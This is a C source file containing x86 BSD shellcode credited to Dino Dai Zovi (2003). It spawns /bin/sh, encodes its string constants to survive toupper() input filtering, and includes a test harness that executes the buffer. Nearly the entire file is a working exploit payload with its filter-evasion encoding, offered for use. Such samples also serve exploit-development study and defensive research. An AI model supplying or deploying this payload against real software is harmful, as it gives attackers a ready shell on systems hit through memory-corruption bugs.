/*
 * toupper() evasion BSD exec("/bin/sh", 0, 0) shellcode
 *
 * Dino Dai Zovi <ddz@theta44.org>, 20030713
 */
char shellcode[] = 
    "\x31\xc0"                  /* xorl   %eax,%eax        */
    "\x50"                      /* pushl  %eax             */
    "\xb9\xee\xed\x31\x27"      /* movl   $0x2731edee,%ecx */
    "\x81\xc1\x41\x41\x41\x41"  /* addl   $0x41414141,%ecx */
    "\x51"                      /* pushl  %ecx             */
    "\xb9\xed\x1f\x27\x2c"      /* movl   $0x2c271fed,%ecx */
    "\x81\xc1\x42\x42\x42\x42"  /* addl   $0x42424242,%ecx */
    "\x51"                      /* pushl  %ecx             */
    "\x89\xe3"                  /* movl   %esp,%ebx        */
    "\x50"                      /* pushl  %eax             */
    "\x54"                      /* pushl  %esp             */
    "\x53"                      /* pushl  %ebx             */
    "\x50"                      /* pushl  %eax             */
    "\xb0\x3b"                  /* movb   $0x3b,%al        */
    "\xcd\x80";                 /* int    $0x80            */

#ifdef TEST_SHELLCODE
int main() { void (*f)(void) = (void (*)(void))shellcode; (f)(); }
#endif